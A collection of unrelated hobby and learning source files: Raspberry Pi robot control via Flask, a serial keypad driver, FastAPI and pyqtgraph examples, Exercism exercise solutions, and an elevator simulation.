pin.load("config.json")
for i in range(0,30):
f15()
f24()
f3()
f24()
    f15()
# cleanup
pin.cleanup()
```
#### File: RobotHack2021/server1/mysimpleserver.py
```python
from flask import Flask
app = Flask(__name__)
@app.route("/")
def showIndex():
return "Hello Martin"
if __name__ == "__main__":
app.run(host="0.0.0.0")
```
#### File: RobotHack2021/server3/server3.py
```python
import pin
from flask import Flask
app = Flask(__name__)
pin.load("config.json")
filename="control.html"
@app.route("/")
def showIndex():
with open(filename, "r") as file:
return file.read()
@app.route("/move/<left>/<right>")
def moveTo(left,right):
print(left,right)
ena=int(left)
enb=int(right)
# set the motor speed
if(ena>=0):
ena = min(ena, 100)
pin.Level("ENA",ena)
pin.Out("IN1",0)
pin.Out("IN2",1)
else:
ena_minus = abs(ena)
ena_minus = min(ena_minus, 100)
pin.Level("ENA",ena_minus)
pin.Out("IN1",1)
pin.Out("IN2",0)
if(enb>=0):
enb = min(enb, 100)
pin.Level("ENB",enb)
pin.Out("IN3",1)
pin.Out("IN4",0)
else:
enb_minus = abs(enb)
enb_minus = min(enb_minus, 100)
pin.Level("ENB",enb_minus)
pin.Out("IN3",0)
pin.Out("IN4",1)
with open(filename, "r") as file:
return file.read()
if __name__ == "__main__":
app.run(host="0.0.0.0")
```
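A client-side sketch for the `/move/<left>/<right>` route; the host address is an assumption, and Flask's default port 5000 is assumed:

```python
import requests

base = "http://192.168.0.42:5000"      # the Pi's address is an assumption
requests.get(base + "/move/60/60")     # forward at 60% duty on both motors
requests.get(base + "/move/-40/40")    # spin in place
requests.get(base + "/move/0/0")       # stop
```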
#### File: RobotHack2021/stepper/pin.py
```python
import json
import RPi.GPIO as GPIO
# BCM Mode (read the real GPIO)
GPIO.setmode(GPIO.BCM)
# store all the items in dict after read json
pinItems = {}
# open the file
def load(filename):
try:
# open
with open(filename, "r") as file:
# read and parse JSON
items = json.loads(file.read())
except:
# if something goes wrong
print("Error loading config.json")
exit(0)
# store the items by name
# i.e. pinItems["switch"] = ...
global pinItems
pinItems = items;
# initialize all pins as
# in, out or pwm
for name, item in items.items():
pin = item["pin"]
if(item["io"] == "in"):
# configure an input
GPIO.setup(pin, GPIO.IN, pull_up_down = GPIO.PUD_UP)
if(item["io"] == "out"):
# configure an output
GPIO.setup(pin, GPIO.OUT)
if(item["io"] == "pwm"):
# configure pwm
GPIO.setup(pin, GPIO.OUT)
pinItems[name]=GPIO.PWM(pin,500)
# GPIO input
def In(name):
global pinItems
return GPIO.input(pinItems[name]["pin"])
# GPIO output
def Out(name,state):
global pinItems
GPIO.output(pinItems[name]["pin"], state)
#GPIO pwm level
def Level(name,level):
global pinItems
if(level == 0):
pinItems[name].stop()
else:
pinItems[name].start(0)
pinItems[name].ChangeDutyCycle(level)
def cleanup():
GPIO.cleanup()
``` |
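`load()` expects each named entry to carry a `pin` number and an `io` mode of `in`, `out`, or `pwm`. A hypothetical `config.json` and usage sketch (names and pin numbers are assumptions):

```python
# config.json might look like this (BCM numbering; values are assumptions):
# {
#     "LED1": {"pin": 17, "io": "out"},
#     "ENA":  {"pin": 18, "io": "pwm"},
#     "BTN":  {"pin": 27, "io": "in"}
# }
import pin

pin.load("config.json")
pin.Out("LED1", 1)     # drive the LED high
pin.Level("ENA", 50)   # 50% PWM duty cycle
print(pin.In("BTN"))   # read the (pulled-up) button
pin.cleanup()
```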
{
"source": "3mpr/OSRBox",
"score": 3
} |
#### File: 3mpr/OSRBox/OSRBoxDriver.py
```python
import OSRBoxWrapper
import serial.tools.list_ports
import keyboard
import threading
import time
import os
import yaml
class OSRBoxDriver:
nb_keys = 5
'''
Class Constructor.
Initializes a few important variables, such as COM port, baudrate and
emulated keys.
'''
def __init__( self, port = False ):
self.port = None
self.emulated_keys = { 1 : 'a', 2 : 'z', 3 : 'e', 4 : 'r', 5 : 't' }
self.osr_conf = self.load_conf( 'OSRBox.yml' )
self.delayed_setup = True
if port:
self.delayed_setup = False
self.port = port
elif port is False and self.osr_conf['port']:
self.port = self.osr_conf['port']
#self.pad = OSRBoxWrapper.OSRBoxWrapper( port, 19200 )
'''
Destructor redifinition.
'''
def __del__( self ):
self.reader_alive = False
self.alive = False
self.pad.close()
'''
Binds one of the OSRBox numerical keys to emulate a given keyboard key.
@param int nb The pressed OSRBox key
@param string key The emulated key description
'''
def bind( self, nb, key):
if ( nb > self.nb_keys ):
raise ValueError( 'There is only 5 keys on the OSRBox!' )
self.emulated_keys[nb] = key
'''
Keeps track of the current OSRBox pressed key and emulate keyboard keys
according to the <emulated_keys> dictionnary.
'''
def reader( self ):
last_key_pressed = False
while self.reader_alive:
key_pressed = self.pad.read()
if key_pressed:
for key in self.emulated_keys:
if key_pressed == key and key_pressed != last_key_pressed:
last_key_pressed = key_pressed
keyboard.press( self.emulated_keys[key] )
elif last_key_pressed:
keyboard.release( self.emulated_keys[last_key_pressed] )
last_key_pressed = False
'''
Runs two thread, one is a MINI(!)term and let the user ends the program,
the other keeps updated the current active key.
'''
def bootstrap( self ):
if self.delayed_setup:
self.conf = self.load_conf()
if not self.port:
self.port = OSRBoxDriver.seek_port()
self.pad = OSRBoxWrapper.OSRBoxWrapper( self.port, 19200 )
self.osr_conf = self.load_conf( 'OSRBox.yml' )
for k in self.osr_conf['keys']:
self.bind( k, self.osr_conf['keys'][k] )
self.pad.open()
self.reader_alive = True
self._reader = threading.Thread( target = self.reader, name = 'rx' )
self._reader.start()
self._reader.join()
self._term = threading.Thread( target = self.term, name = 'term' )
self._term.start()
'''
'''
def run( self ):
self.alive = True
self.reader_alive = True
while self.alive:
try:
self.bootstrap()
            except (serial.serialutil.SerialException, TypeError):
self.reader_alive = False
self.port = None
time.sleep( 1 )
'''
Ends the process.
'''
def stop( self ):
self.reader_alive = False
self.alive = False
'''
Exit mini (one key!) terminal.
'''
def term( self ):
while self.reader_alive:
exit = raw_input( 'Press Q to stop the OSRBox...' )
if exit == 'Q':
self.reader_alive = False
self.alive = False
'''
'''
def load_conf( self, fd = 'OSRBox.yml' ):
stream = open( fd, 'r' )
yaml_fd = yaml.load( stream )
stream.close()
return yaml_fd['OSRBox']
'''
Seeks the first available COM port and returns it.
@return string The port name
'''
@staticmethod
def seek_port():
print( '\nStarting port analysis...' )
available_com = None
while not available_com:
time.sleep( 1 )
available_com = serial.tools.list_ports.comports()
return available_com[0].device
if __name__ == '__main__':
drv = OSRBoxDriver()
drv.run()
``` |
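`load_conf()` reads everything under the `OSRBox` key of `OSRBox.yml`: a serial `port` plus a `keys` mapping from key number to a name the `keyboard` package understands. A hypothetical config and launch sketch (the port and key names are assumptions):

```python
# OSRBox.yml sketch:
#
# OSRBox:
#   port: COM3
#   keys:
#     1: left
#     2: right
#     3: up
#     4: down
#     5: space

drv = OSRBoxDriver('COM3')
drv.run()
```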
{
"source": "3mRoshdy/Learn-FastAPI",
"score": 3
} |
#### File: 3mRoshdy/Learn-FastAPI/main.py
```python
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
@app.get('/')
async def root():
return { "message": "Hello World" }
@app.get('/people/{person_name}')
async def greet_person(
person_name: str, extras: Optional[str] = None
):
response = {"message": "Hello there %s!" % person_name}
if extras:
response.update({"extras": extras})
return response
``` |
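Both routes can be exercised with FastAPI's test client; a sketch (the test client needs FastAPI's usual test dependencies installed):

```python
from fastapi.testclient import TestClient
from main import app

client = TestClient(app)

assert client.get("/").json() == {"message": "Hello World"}
resp = client.get("/people/Ada", params={"extras": "hi"})
assert resp.json() == {"message": "Hello there Ada!", "extras": "hi"}
```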
{
"source": "3mrrrx/slim2voice",
"score": 3
} |
#### File: slim2voice/tut/live_pyQtpgrah_fft.py
```python
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import pyqtgraph.exporters
import numpy as np
import serial
ser = serial.Serial(
port='COM4',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1
)
ser.close()
ser.open()
print (ser.isOpen())
data = np.zeros(64)
app = QtGui.QApplication([])
p = pg.plot()
p.setWindowTitle('FFT')
p.setLabel('bottom', 'Index', units='B')
curve = p.plot()
def update():
    global curve, data
if(ser.readline() == b'*\n'): # "*" indicates start of transmission from tiva c
for h in range(63):
try:
data[h] = int(ser.readline()) #get 64 bytes from tiva c and plot them
except:
pass
curve.setData(data)
app.processEvents() ## force complete redraw for every plot
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
```
#### File: slim2voice/tut/plots_insame_window.py
```python
# import initExample  ## Add path to library (just for examples; you do not need this)
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import pyqtgraph.exporters
import numpy as np
import cv2
import time
# for logging function
import sys, os
# debug flags
show_imgs_for_colors = 1
def read_frame(scale_factor=1):
ret, frame2 = cap.read()
# rescale image for perfromance
scale = 1 / len(colors) / scale_factor
imgs = cv2.resize(frame2, (0, 0), None, scale, scale)
return imgs, frame2
def percent_color(img, color_min = np.array([0, 0, 128], np.uint8), color_max= np.array([250, 250, 255], np.uint8) ):
#RED_MIN = np.array([0, 0, 128], np.uint8)
#RED_MAX = np.array([250, 250, 255], np.uint8)
size = img.size
dstr = cv2.inRange(img, color_min, color_max)
no_color = cv2.countNonZero(dstr)
frac_color = np.divide((float(no_color)), (int(size)))
percent_color = np.multiply((float(frac_color)), 100)
#print('color: ' + str(percent_color) + '%')
return percent_color
def percent_color_singel(img,color = [145,80,40], threshold = 20, disp = "image" ):
boundaries = [([max(color[2] - threshold,0),max(color[1] - threshold,0),max(color[0] - threshold,0)],
[min(color[2] + threshold,255), min(color[1] + threshold,255), min(color[0] + threshold,255)])]
# in order BGR as opencv represents images as numpy arrays in reverse order
for (lower, upper) in boundaries:
lower = np.array(lower, dtype=np.uint8)
upper = np.array(upper, dtype=np.uint8)
mask = cv2.inRange(img, lower, upper)
output = cv2.bitwise_and(img, img, mask=mask)
ratio_brown = cv2.countNonZero(mask) / (img.size / 3)
perc = np.round(ratio_brown * 100, 2)
#print('the color: ' + str(color) + ' ,has a pixel percentage:', perc, '%.')
##cv2.imshow( disp, np.hstack([img, output]))
#cv2.imshow(disp, output)
#cv2.waitKey(0)
return perc, output
def FFT_AMP(data):
data= data - data.mean()
data=np.hamming(len(data))*data
data=np.fft.fft(data)
data=np.abs(data)
return data
###########################################################################################################################
# video source
###########################################################################################################################
# web cam
cap = cv2.VideoCapture(0)
###########################################################################################################################
# initial variables
###########################################################################################################################
# colors to select from
#colors = [([145, 80, 40], 50), ([50, 80, 255], 50), ([185, 130, 51], 50), ([50, 10, 39], 50), ([50, 80, 39], 50)]
#colors = [([255, 0, 0], 50), ([0, 0, 0], 50), ([135,4,0], 50), ([0, 255, 0], 50), ([200, 130, 180], 50),([255, 0, 255], 50),([185,124,109], 50)]
#colors = [([150, 150, 150], 120), ([0, 0, 0], 50), ([150, 150, 150], 70), ([0, 0, 0], 20)]
#colors = [ ([150, 150, 150], 70), ([0, 0, 0], 20)]
colors = [([135,4,0], 50), ([0,0,0], 30)]
# number of saved frames for witch the perc. are saved
perc_buffer = 128
#color_perc_list = [] # list of all color percentages of all frames
color_perc_list = np.empty([len(colors),perc_buffer])
###########################################################################################################################
# capture first frame
###########################################################################################################################
# start fps timer
t = time.time()
frame_num = 0
# capture first frame
ret, frame1 = cap.read()
prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
hsv = np.zeros_like(frame1)
hsv[...,1] = 255
###########################################################################################################################
# create plot window
###########################################################################################################################
app = QtGui.QApplication([])
# set background color to white
# pg.setConfigOption('background', 'w')
# pg.setConfigOption('foreground', 'k')
# create window for graphs
win = pg.GraphicsLayoutWidget(show=True, title="Basic plotting examples")
win.resize(1000,600)
win.setWindowTitle('pyqtgraph example: Plotting')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
#win = pg.GraphicsWindow()
###########################################################################################################################
# print frames
###########################################################################################################################
# pimg = win.addPlot(title="imgs")
#
# pq_images = []
# for color ,threshold in colors:
# pq_images.append(pimg.ImageView())
#
# imv = pg.ImageView()
# imv.show()
#
# win.nextRow()
###########################################################################################################################
# color plot
###########################################################################################################################
p = win.addPlot(title="Color Progration Over Time")
p.plot()
p.setWindowTitle('FFT')
p.setLabel('bottom', 'Index', units='B')
p.showGrid(x=True, y=True, alpha=None)
#p.setLimits(yMin=0,yMax=100)
#p.enableAutoRange(axis=None, enable=False)
p.addLegend()
lines_prog = []
for color ,threshold in colors:
#color_scaled = [x for x in color]
rgb_color = tuple(color)
#lines_prog.append(ax_prog.plot([], [], color=rgb_color, label=str(color)))
#lines_prog.append(p.plot( pen=pg.mkPen(pg.QColor(rgb_color), width=5), name=str(rgb_color)))
#lines_prog.append(p.plot( pen=QPen(QColor(255,0,0))))
lines_prog.append(p.plot(pen=rgb_color, width=10, name=str(color),row=0, col=0))
#lines_prog.append(win.addPlot(pen=rgb_color, width=10, name=str(color_scaled),row=0, col=0))
win.nextRow()
###########################################################################################################################
# RGB Histogram plot
###########################################################################################################################
p_hist = win.addPlot(title="Color Histogram")
p_hist.plot()
p_hist.setWindowTitle('histogram')
p_hist.setLabel('bottom', 'Index', units='B')
p_hist.addLegend()
p_hist.showGrid(x=True, y=True, alpha=None)
p_hist.setLimits(yMax=1,yMin=0,xMin=0)
phist_colors = ('b', 'g', 'r') # cv2 stores channels in BGR order
phist = []
for color in phist_colors:
rgb_color = tuple(color)
phist.append(p_hist.plot(pen=color, width=10, name=str(color)))
###########################################################################################################################
# fft plot
###########################################################################################################################
win.nextRow()
RATE = 30
data_fft=np.zeros(perc_buffer)
axis_fft=np.fft.fftfreq(perc_buffer, d=1.0/RATE)
p_fft = win.addPlot(title="FFT")
p_fft.plot()
p_fft.setWindowTitle('FFT')
p_fft.setLabel('bottom', 'Index', units='B')
p_fft.addLegend()
p_fft.showGrid(x=True, y=True, alpha=None)
p_fft.setLimits(yMax=100,yMin=0)
#p_fft.autoRange(enable=False)
pfft = []
for color ,threshold in colors:
color_scaled = [x for x in color]
rgb_color = tuple(color_scaled)
pfft.append(p_fft.plot(axis_fft,data_fft, pen=rgb_color, width=10, name=str(color_scaled),row=0, col=1))
###########################################################################################################################
# histogram LAB color space
###########################################################################################################################
p_hist_lab = win.addPlot(title="Color Histogram LAB ")
p_hist_lab.plot()
p_hist_lab.setWindowTitle('histogram')
p_hist_lab.setLabel('bottom', 'Index', units='B')
p_hist_lab.addLegend()
p_hist_lab.showGrid(x=True, y=True, alpha=None)
p_hist_lab.setLimits(yMax=1,yMin=0,xMin=0)
phist_colors_names = ('y', 'k', 'r')
phist_lab = []
name_lab = ["l","a","b"]
for i, color in enumerate(name_lab):
rgb_color = tuple(color)
phist_lab.append(p_hist_lab.plot(pen=phist_colors_names[i], width=10, name=str(name_lab[i])))
###########################################################################################################################
# update
###########################################################################################################################
def update():
global lines_prog, data, t, frame_num, colors, color_perc_list, \
show_imgs_for_colors, p, pfft, data_fft, axis_fft, RATE, phist_colors
# read frame
img, frame2 = read_frame(0.5)
    # calculate the color percentages
color_prec_frame = [] # list of color percentages for current frame
    imgs = img # save the original image
index = 0
for color, threshold in colors:
color_pers_i, img = percent_color_singel(img, color=color, threshold=threshold, disp= str(color))
color_prec_frame.append(color_pers_i)
imgs = np.hstack((imgs,img))
index += 1
if show_imgs_for_colors == 1:
#images_per_row = 2
#cv2.imshow( "ALL_1", np.hstack(imgs))
cv2.imshow( "ALL_1", imgs)
# for x in enumerate(pq_images):
# #pimg.image(x)
# x.setImage(imgs[i])
#x.setData(imgs[i])
    # append this frame's percentages to the rolling buffer of past frames
color_perc_list = np.roll(color_perc_list, -1, axis=1)
color_perc_list[:,-1] = color_prec_frame
    # update data for the line progression plot
for i, x in enumerate(lines_prog):
#print(color_perc_list[i,:])
x.setData(color_perc_list[i,:])
# map(lambda x,y: x.setData(y), lines_prog, color_perc_list.tolist())
# update RGB color space histogram and set plot data
for i, x in enumerate(phist):
histr = cv2.calcHist([frame2], [i], None, [256], [0, 256])
histr = cv2.normalize(histr,histr)
#print(np.shape(histr))
x.setData(np.reshape(histr, np.shape(histr)[0]))
# update fft and set data for plot
for i, x in enumerate(pfft):
# calc fft
data_fft = color_perc_list[i,:]
fft_data=FFT_AMP(data_fft)
axis_pfft=np.fft.fftfreq(len(data_fft), d=1.0/RATE)
#plot data
x.setData(x=np.abs(axis_fft), y=fft_data)
# update lab colorspace histogram and set data for plot
frame2Lab = cv2.cvtColor(frame2, cv2.COLOR_BGR2LAB)
for i, x in enumerate(phist_lab):
histr = cv2.calcHist([frame2Lab], [i], None, [256], [0, 256])
histr = cv2.normalize(histr,histr)
#print(np.shape(histr))
x.setData(np.reshape(histr, np.shape(histr)[0]))
    # calc frame rate every 10 frames
    frame_num += 1
    if frame_num % 10 == 0:
        elapsed = time.time() - t
        print("fps: " + str(10 / elapsed))
        t = time.time()
app.processEvents() ## force complete redraw for every plot
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(0)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
``` |
{
"source": "3mtee/exercism-python",
"score": 4
} |
#### File: exercism-python/darts/darts.py
```python
from math import sqrt
def score(x, y):
d = sqrt(x ** 2 + y ** 2)
if d <= 1:
return 10
if d <= 5:
return 5
if d <= 10:
return 1
return 0
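# Example (illustrative): x, y are the dart's coordinates relative to the center
#   score(0, 0) == 10   (inner circle, radius <= 1)
#   score(0, 3) == 5    (middle circle, radius <= 5)
#   score(6, 8) == 1    (outer circle, distance exactly 10)
#   score(9, 9) == 0    (outside the target)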
```
#### File: exercism-python/difference-of-squares/difference_of_squares.py
```python
def square_of_sum(number):
return sum(range(0, number + 1)) ** 2
def sum_of_squares(number):
return sum([i ** 2 for i in range(0, number + 1)])
def difference_of_squares(number):
return square_of_sum(number) - sum_of_squares(number)
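# Example: for number = 10
#   square_of_sum(10) == 55 ** 2 == 3025
#   sum_of_squares(10) == 385
#   difference_of_squares(10) == 2640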
```
#### File: exercism-python/hangman/hangman.py
```python
STATUS_WIN = "win"
STATUS_LOSE = "lose"
STATUS_ONGOING = "ongoing"
class Hangman:
def __init__(self, word):
self.remaining_guesses = 9
self.status = STATUS_ONGOING
self.word = word
self.masked_word = "".join("_" for x in word)
def guess(self, char):
if self.status != STATUS_ONGOING:
raise ValueError("Game is over")
new_masked = "".join(m if w != char or m != "_" else w for w, m in zip(self.word, self.masked_word))
if new_masked == self.masked_word:
self.remaining_guesses -= 1
self.masked_word = new_masked
if self.masked_word.find("_") == -1:
self.status = STATUS_WIN
return
if self.remaining_guesses < 0:
self.status = STATUS_LOSE
def get_masked_word(self):
return self.masked_word
def get_status(self):
return self.status
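# Example walk-through (illustrative):
#   game = Hangman("cat")
#   game.guess("c")   # masked word becomes "c__", guesses left: 9
#   game.guess("z")   # wrong guess, guesses left: 8
# guessing every letter flips the status to STATUS_WIN; running out of
# guesses flips it to STATUS_LOSE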
```
#### File: exercism-python/high-scores/high_scores.py
```python
def latest(scores):
return scores[-1]
def personal_best(scores):
return max(scores)
def personal_top_three(scores):
sorted_scores = sorted(scores, reverse=True)
return sorted_scores[0:3]
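# Example (illustrative):
#   scores = [10, 30, 90, 30, 100, 20, 10, 0, 30, 40, 40, 70, 70]
#   latest(scores) == 70
#   personal_best(scores) == 100
#   personal_top_three(scores) == [100, 90, 70]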
```
#### File: exercism-python/isogram/isogram.py
```python
def is_isogram(string: str):
clean_string = "".join(c for c in string.lower() if c.isalpha())
return len(set(clean_string)) == len(clean_string)
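# Example: is_isogram("lumberjacks") is True, is_isogram("isograms") is False;
# case and non-letters are ignored, so "six-year-old" also counts as an isogram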
```
#### File: exercism-python/matrix/matrix.py
```python
class Matrix:
def __init__(self, matrix_string: str):
lines = matrix_string.splitlines()
self.__matrix = [list(map(int, line.split())) for line in lines]
def row(self, index):
return self.__matrix[index - 1]
def column(self, index):
return [row[index - 1] for row in self.__matrix]
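# Example (illustrative):
#   m = Matrix("1 2\n3 4")
#   m.row(1) == [1, 2]       # indices are 1-based
#   m.column(2) == [2, 4]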
```
#### File: exercism-python/protein-translation/protein_translation.py
```python
codon_protein = {
"AUG": "Methionine",
"UUU": "Phenylalanine",
"UUC": "Phenylalanine",
"UUA": "Leucine",
"UUG": "Leucine",
"UCU": "Serine",
"UCG": "Serine",
"UCC": "Serine",
"UCA": "Serine",
"UAU": "Tyrosine",
"UAC": "Tyrosine",
"UGU": "Cysteine",
"UGC": "Cysteine",
"UGG": "Tryptophan",
"UAA": None,
"UAG": None,
"UGA": None
}
def proteins(strand: str):
codons = get_codons(strand)
result = []
for codon in codons:
protein = codon_protein[codon]
if protein is None:
break
if protein not in result:
result.append(protein)
return result
def get_codons(strand):
chunk_size = 3
codons = [strand[i:i + chunk_size] for i in range(0, len(strand), chunk_size)]
return codons
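# Example: proteins("AUGUUUUGG") == ["Methionine", "Phenylalanine", "Tryptophan"]
# translation stops at the first STOP codon ("UAA", "UAG", "UGA"), and this
# implementation also collapses repeated proteins into a single entry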
```
#### File: exercism-python/saddle-points/saddle_points.py
```python
def saddle_points(matrix):
if len(set(map(len, matrix))) > 1:
raise ValueError("Irregular matrices are forbidden")
rotated_matrix = list(zip(*matrix))
points = set()
for i, row in enumerate(matrix):
for j, x in enumerate(row):
if x == max(row) and x == min(rotated_matrix[j]):
points.add((i, j))
return [{"row": p[0] + 1, "column": p[1] + 1} for p in points]
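# Example (illustrative): a saddle point is the max of its row and the min of its column
#   saddle_points([[9, 8, 7],
#                  [5, 3, 2],
#                  [6, 6, 7]]) == [{"row": 2, "column": 1}]   # the 5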
```
#### File: exercism-python/series/series.py
```python
def slices(series, length):
series_length = len(series)
if length > series_length or length < 1:
raise ValueError("Incorrect length was requested")
return [series[a:a + length] for a in range(0, series_length - length + 1)]
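# Example (illustrative):
#   slices("49142", 3) == ["491", "914", "142"]
# a length of 0, or one longer than the series, raises ValueError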
```
#### File: exercism-python/space-age/space_age.py
```python
class SpaceAge:
PLANET_RATIOS = [(k, v * 31557600) for k, v in (
('earth', 1.0),
('mercury', 0.2408467),
('venus', 0.61519726),
('mars', 1.8808158),
('jupiter', 11.862615),
('saturn', 29.447498),
('uranus', 84.016846),
('neptune', 164.79132)
)]
def __init__(self, seconds):
self.seconds = seconds
for planet, ratio in self.PLANET_RATIOS:
setattr(self, 'on_' + planet, self._planet_years(ratio))
def _planet_years(self, ratio):
return lambda r=ratio: round(self.seconds / r, 2)
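# Example (canonical exercism case): one billion seconds
#   SpaceAge(1000000000).on_earth()   == 31.69
#   SpaceAge(1000000000).on_mercury() == 131.57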
``` |
{
"source": "3n5/functions-python",
"score": 4
} |
#### File: 3n5/functions-python/[function] matrix and csv.py
```python
import numpy
import csv
import pandas
dir_input=r'C:/Users/user/Desktop/input_data.csv'
dir_output=r'C:/Users/user/Desktop/output_data.csv'
df = pandas.read_csv(f'{dir_input}',encoding='UTF-8', header=None) #No index
df = df.values #'numpy.ndarray' #[1:,1:,]#index
df = df[1:3,1:3]#snip
df = numpy.where(df > 3, 1, -1)#if
df = pandas.DataFrame(df)
df.to_csv(f'{dir_output}',index=False,header=None)
"""transpose of a matrix"""
def matrix_transposed():
print(__doc__)
import numpy as np
import csv
A=[1,2,3]
B=[4,5,6]
C=[7,8,9]
D=[A,B,C]
print(D) #[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
DT= np.array(D).T.tolist()
print(DT)#[[1, 4, 7], [2, 5, 8], [3, 6, 9]]
with open('data.csv', 'w') as file:
writer = csv.writer(file, lineterminator='\n')
writer.writerows(DT)
```
#### File: 3n5/functions-python/[functions] Time_related.py
```python
def time_elapsed():
import time
print(__doc__)
start = time.time()
print('== Replace the program you want to time here ==') and time.sleep(1)
end = time.time()
_time=end-start
hour,min,sec=_time//3600,_time//60,_time%60
print(f'It takes about {hour:.0f} hours {min:.0f} min {sec:.0f} sec')
return 0
time_elapsed()
"""Get the current time"""
def time_current():
import datetime
print(__doc__)
current=datetime.datetime.today().strftime('%Y%m%d_%H%M%S')
print(current)
time_current()
```
#### File: 3n5/functions-python/png2csv.py
```python
import numpy as np
import imageio
file="900o"
def png2csv(file):
img = (imageio.imread("{0}.png".format(file), as_gray=True))
img = np.array(img)
np.savetxt("{0}.csv".format(file), img, delimiter=",")
png2csv("z48mm_rot000_3")
png2csv("z40mm_rot004_3")
png2csv("z40mm_rot000_3")
png2csv("re_z48mm_00deg_phs")
png2csv("re_z48mm_00deg_amp")
png2csv("re_z40mm_04deg_phs")
png2csv("re_z40mm_04deg_amp")
png2csv("re_z40mm_00deg_phs")
png2csv("re_z40mm_00deg_amp")
``` |
{
"source": "3NCRY9T3R/HacktoberFest-DSC-ABESEC",
"score": 4
} |
#### File: HacktoberFest-DSC-ABESEC/Python/diamondpattern.py
```python
def pattern(n):
k = 2 * n - 2
for i in range(0, n):
for j in range(0 , k):
print(end=" ")
k = k - 1
for j in range(0 , i + 1 ):
print("* ", end="")
print("\r")
k = n - 2
for i in range(n , -1, -1):
for j in range(k , 0 , -1):
print(end=" ")
k = k + 1
for j in range(0 , i + 1):
print("* ", end="")
print("\r")
num = int(input("Enter the diamond size (rows in the top half): "))
pattern(num)
```
#### File: HacktoberFest-DSC-ABESEC/Python/tree.py
```python
class Node:
def __init__(self, data):
self.left = None
self.right = None
self.data = data
def PrintTree(self):
print(self.data)
root = Node(10)
root.PrintTree()
# Traversing a Linked List
class Node:
def __init__(self, dataval=None):
self.dataval = dataval
self.nextval = None
class SLinkedList:
def __init__(self):
self.headval = None
def listprint(self):
printval = self.headval
while printval is not None:
print (printval.dataval)
printval = printval.nextval
llist = SLinkedList()
llist.headval = Node("Mon")
e2 = Node("Tue")
e3 = Node("Wed")
# Link first Node to second node
llist.headval.nextval = e2
# Link second Node to third node
e2.nextval = e3
llist.listprint()
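# Expected output: Mon, Tue and Wed, one per line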
``` |
{
"source": "3ndG4me/ElevatorSim",
"score": 3
} |
#### File: 3ndG4me/ElevatorSim/CarBtn.py
```python
from ElevatorComponent import ElevatorComponent
from Messages import *
class CarBtn(ElevatorComponent):
def __init__(self, ElevatorCar):
super().__init__()
# output
self.OUT = None # Recipient is Car Controller
# Coupled Input/Output: Sends and receives from Car Controller so an instance of the controller is needed
self.car = ElevatorCar
def press(self, id):
# Send Message MsgReq -> OUT
self.OUT = MsgReq("out", id)
# Generate button pressed log
self.write_log(self.get_sim_time(), self.get_real_time(),"Car Btn","Elevator Car","S","out",self.OUT)
self.car.setoReqMsg(self.OUT)
def state_processor(self):
pass
def main(self):
pass
if __name__ == '__main__':
car = None
button = CarBtn(car)
button.main()
```
#### File: 3ndG4me/ElevatorSim/Floor.py
```python
import time
from ElevatorComponent import ElevatorComponent
from Messages import MsgFloor, CommandFloor, MsgDoor, CommandDoor, StatusDoor, MsgReq
from enum import Enum
class STATE(Enum):
"""
States used exclusively by Floor
"""
OPENED = "opened"
CLOSED = "closed"
class FloorDoor(ElevatorComponent):
processing_time = 5.0 # double, set arbitrarily
motion_time = 3.0 # double, set arbitrarily
def __init__(self, floor_id, iCmd, oStatus):
super().__init__()
# component variables
self.id = floor_id # int
self.job = None # entity
self.input = iCmd
self.out = oStatus
self.state = STATE.CLOSED
def open_door(self):
# print("FLOOR {} OPENING DOOR...").format(self.id)
time.sleep(self.motion_time)
self.state = STATE.OPENED
msg = MsgDoor("oStatus", StatusDoor().DOOR_FLOOR_OPENED, self.id, False)
self.write_log(self.get_sim_time(), self.get_real_time(),"Floor_" + str(self.id), "", "C", "", msg)
self.out.send(msg)
self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.id), "DoorStatusProc", "S", "oStatus", msg)
def close_door(self):
# print("FLOOR {} CLOSING DOOR...").format(self.id)
time.sleep(self.motion_time)
self.state = STATE.CLOSED
msg = MsgDoor("oStatus", StatusDoor().DOOR_FLOOR_CLOSED, self.id, False)
self.write_log(self.get_sim_time(), self.get_real_time(),"Floor_" + str(self.id), "", "C", "", msg)
self.out.send(msg)
self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.id), "DoorStatusProc", "S", "oStatus", msg)
def receive_in(self):
if self.input.poll():
msg = self.input.recv()
self.write_log(self.get_sim_time(), self.get_real_time(), "ElevCtrl", "Floor_" + str(self.id), "R", "iCmd", msg)
self.job = msg.contents.get("value")
return True
else:
return False
def state_processor(self):
while True:
if self.receive_in():
# print("FLOOR {} JOB is {}".format(self.id, self.job))
if self.job == CommandDoor.DOOR_FLOOR_X_OPEN:
# print("FLOOR_{} opening door...".format(self.id))
self.job = None
self.open_door()
"""
if self.state == STATE.OPENED:
continue
else:
self.open_door()
"""
elif self.job == CommandDoor.DOOR_FLOOR_X_CLOSE:
# print("FLOOR_{} closing door...".format(self.id))
self.job = None
self.close_door()
"""
if self.state == STATE.CLOSED:
continue
else:
self.close_door()
"""
elif self.state == STATE.OPENED:
time.sleep(self.processing_time)
self.close_door()
continue
def main(self):
self.state_processor()
class Floor(ElevatorComponent):
def __init__(self, floor_id, in_cmd, out_req, out_status):
super().__init__()
# input
self.iCmd = in_cmd
# outputs
self.oReq = out_req
self.oStatus = out_status
# msg
self.iCmd_msg = None
# component vars
self.door = FloorDoor(floor_id, self.iCmd, self.oStatus)
def state_processor(self):
while True:
continue
def main(self):
self.state_processor()
def send_request(self):
# msg = MsgFloor(CommandFloor.FLOOR_REQ, self.door.id)
msg = MsgReq("oReq", self.door.id)
self.oReq.send(msg)
